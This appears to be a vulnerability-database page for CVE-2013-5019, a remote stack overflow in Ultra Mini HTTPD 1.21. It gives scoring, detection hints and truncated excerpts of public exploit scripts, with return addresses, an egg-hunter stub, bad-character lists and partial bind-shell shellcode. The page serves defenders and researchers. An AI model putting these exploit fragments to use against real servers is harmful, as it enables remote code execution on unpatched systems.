CVE-2013-5019
published 2013-07-31CVE-2013-5019: Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.
PriorityP276critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
64.39%
99.1th percentile
Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vector | ultra_mini_httpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
BadChars: \x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f
bytes↗
Egg hunter tag: no0bno0b (\x6e\x6f\x30\x62\x6e\x6f\x30\x62)
bytes↗
Egg hunter stub: \x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
- →Detect HTTP GET requests with a URI longer than 5392 bytes followed by a 4-byte little-endian return address and NOP sled pattern targeting Ultra Mini HTTPD. ↗
- →Detect HTTP POST requests with a body/URI exceeding 5438 bytes, characteristic of the POST-based buffer overflow variant against Ultra Mini HTTPD 1.21. ↗
- →Monitor for the egg-hunter tag string 'no0bno0b' appearing in HTTP request URIs, which is used by the Windows 7 PoC exploit to locate shellcode in memory. ↗
- →The exploit's request handler thread is terminated after 60 seconds by a monitor thread; exploits may use VirtualAlloc + CreateThread + SuspendThread stager patterns to survive this. Look for these API call sequences in memory or network payloads. ↗
- →The Metasploit module uses a StackAdjustment of -3500 bytes; look for large negative ESP adjustments (e.g., \x81\xc4\xf0\xea\xff\xff = add esp,-0x1510) immediately after EIP control in shellcode stagers. ↗
- ·Return addresses (JMP ESP / CALL ESP gadgets) are module-specific and vary by OS version: 0x77c354b4 (msvcrt.dll, XP SP3), 0x7C941EED (ntdll.dll, XP SP2), 0x7E429353 (user.dll, XP SP3), 0x764046cd (msvcrt.dll, Win7 32-bit). Detection rules relying on these hardcoded values will miss exploits retargeted to other environments. ↗
- ·The EIP offset differs between GET (5412/5392) and POST (5438) exploit variants; detection thresholds must account for both request methods. ↗
- ·Bad characters \x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f are filtered by the application; encoded shellcode will not contain these bytes, so byte-level signature detection must account for encoding (e.g., shikata_ga_nai). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
exploitdb·2018-04-17·CVSS 10.0
CVE-2013-5019 [CRITICAL] Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
---
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019
import sys
import socket
import struct
eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\x
Exploit-DB
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
exploitdb·2014-02-22
CVE-2013-5019 Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
---
#!/usr/bin/python
#
# Title: Mini HTTPD stack buffer overflow POST exploit
# Author: TheColonial
# Date: 20 Feb 2013
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Vendor Homepage: http://www.picolix.jp/
# Version: 1.21
# Tested on: Windows XP Professional SP3
#
# Description:
# This is a slightly more weaponised version of the Mini HTTPD buffer overflow
# written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
# I wrote this up because the existing version had a hard-coded payload and
# didn't work on any of my XP boxes.
#
# The instability of the existing is down to bad chars, and the parent thread
# killing off the child thread when the thing is still running. This exploit
#
Exploit-DB
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)
exploitdb·2014-02-18
CVE-2013-5019 Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)
---
# Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request
# Date: 16 Feb 2014
# Exploit Author: Sumit
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP3
#
# Description:
# A buffer overflow is triggered when requesting a very long url in POST request
#
import socket
shellcode = ( # msfvenom windows/shell_bind_tcp -b '\x00\x09\x0a\x0b\x0c\x0d\x20'
"\xd9\xea\xba\x03\xc9\x19\xa6\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x56\x31\x50\x18\x83\xe8\xfc\x03\x50\x17\x2b\xec\x5a" +
"\xff\x22\x0f\xa3\xff\x54\x99\x46\xce\x46\xfd\x03\x62\x57" +
"\x75\x41\x8e\x1c\xdb\x72\x05\x50\xf4\x75\xae\xdf\x22\xbb" +
"\x2f\
Exploit-DB
Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2013-08-15
CVE-2013-5019 Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)
Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Ultra Mini HTTPD Stack Buffer Overflow",
'Description' => %q{
This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21
allowing remote attackers to execute arbitrary code via a long resource name in an HTTP
request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'superkojiman', #Discovery, PoC
'PsychoSpy ' #Metasploit
],
'References' =>
[
['OSVDB', '95164'],
['EDB','26739'],
['CVE','2013-5019'],
['BID','61130']
],
'Pay
Exploit-DB
Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow
exploitdb·2013-07-11
CVE-2013-5019 Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow
Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow
---
# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description:
# A buffer overflow is triggered when requesting a very long
# resource name.
#
import socket
import struct
# msfpayload windows/shell_bind_tcp R | \
# msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = (
"\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" +
"\xc6\x1e\x
Metasploit
Ultra Mini HTTPD Stack Buffer Overflow
metasploit
Ultra Mini HTTPD Stack Buffer Overflow
Ultra Mini HTTPD Stack Buffer Overflow
This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21, allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request. This exploit has to deal with the fact that the application's request handler thread is terminated after 60 seconds by a "monitor" thread. To do this, it allocates some RWX memory, copies the payload to it and creates another thread. When done, it terminates the current thread so that it doesn't crash and hence doesn't bring down the process with it.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/95164http://www.exploit-db.com/exploits/26739http://www.exploit-db.com/exploits/31736http://www.exploit-db.com/exploits/31814http://www.securityfocus.com/bid/61130https://exchange.xforce.ibmcloud.com/vulnerabilities/85599https://www.exploit-db.com/exploits/44472/http://osvdb.org/show/osvdb/95164http://www.exploit-db.com/exploits/26739http://www.exploit-db.com/exploits/31736http://www.exploit-db.com/exploits/31814http://www.securityfocus.com/bid/61130https://exchange.xforce.ibmcloud.com/vulnerabilities/85599https://www.exploit-db.com/exploits/44472/
2013-07-31
Published